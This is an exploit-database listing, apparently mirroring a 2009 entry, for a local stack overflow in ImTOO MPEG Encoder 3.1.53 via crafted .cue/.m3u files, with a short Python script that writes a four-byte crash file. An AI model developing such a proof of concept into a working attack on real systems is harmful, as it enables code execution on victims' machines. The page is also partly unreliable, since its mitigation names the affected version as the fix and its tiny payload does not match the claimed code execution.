header-logo
Suggest Exploit
vendor:
MPEG Encoder
by:
opt!x hacker
9,3
CVSS
HIGH
Stack Overflow
121
CWE
Product Name: MPEG Encoder
Affected Version From: 3.1.53
Affected Version To: 3.1.53
Patch Exists: Yes
Related CWE: N/A
CPE: a:imtoo:mpeg_encoder
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

ImTOO MPEG Encoder 3.1.53 (.cue/.m3u) local stack overlow POC

ImTOO MPEG Encoder 3.1.53 is vulnerable to a local stack overflow vulnerability. The vulnerability is caused due to a boundary error when handling .cue and .m3u files. By creating a specially crafted .cue or .m3u file, a local attacker can cause a stack-based buffer overflow, overwriting the saved return address and executing arbitrary code.

Mitigation:

Upgrade to the latest version of ImTOO MPEG Encoder 3.1.53
Source

Exploit-DB raw data:

#!/usr/bin/python
print "ImTOO MPEG Encoder 3.1.53 (.cue/.m3u) local stack overlow POC"
print " finded by : opt!x hacker <optix@9.cn> "
print "download: http://www.soft32.com/download/63-300154-1/mpeg-encoder.exe "
junk = "\x41"*4
# file=open("crash.m3u","w")
file=open("crash.cue","w")
file.write(junk)
file.close()

# milw0rm.com [2009-08-06]

Navigation

Suggest Exploit

Services By CQR